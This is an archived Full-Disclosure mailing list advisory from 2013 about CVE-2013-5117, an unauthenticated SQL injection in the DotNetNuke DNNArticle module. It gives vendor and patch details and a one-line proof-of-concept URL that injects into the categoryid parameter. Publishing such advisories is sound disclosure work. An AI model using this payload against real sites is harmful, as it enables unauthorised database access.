lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20130902094056.262160@gmx.com> Date: Mon, 02 Sep 2013 05:40:56 -0400 From: "Sajjad Pourali" <S.pourali@...l.com> To: full-disclosure@...ts.grok.org.uk Subject: DotNetNuke (DNNArticle Module) SQL Injection Vulnerability Title: DotNetNuke (DNNArticle Module) SQL Injection Vulnerability References: CVE-2013-5117 Discovered by: Sajjad Pourali Vendor http://www.zldnn.com/ , http://www.dnnarticle.com/ Vendor advisory: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979) Vendor contact: 2013-8-14 Solution: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979) Remote: yes Authentication required: no User interaction required: no Impact: High Affected: - DNNArticle 10.0 and earlier --- PoC: http://www.vulnerable.com/desktopmodules/dnnarticle/dnnarticlerss.aspx?moduleid=0&categoryid=1+or+1=@@version --- + Sajjad Pourali + http://www.securation.com/ + http://www.cert.um.ac.ir/ + Contact: sajjad[at]securation.com Content of type "text/html" skipped View attachment "CVE-2013-5117.txt" of type "text/plain" (823 bytes) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/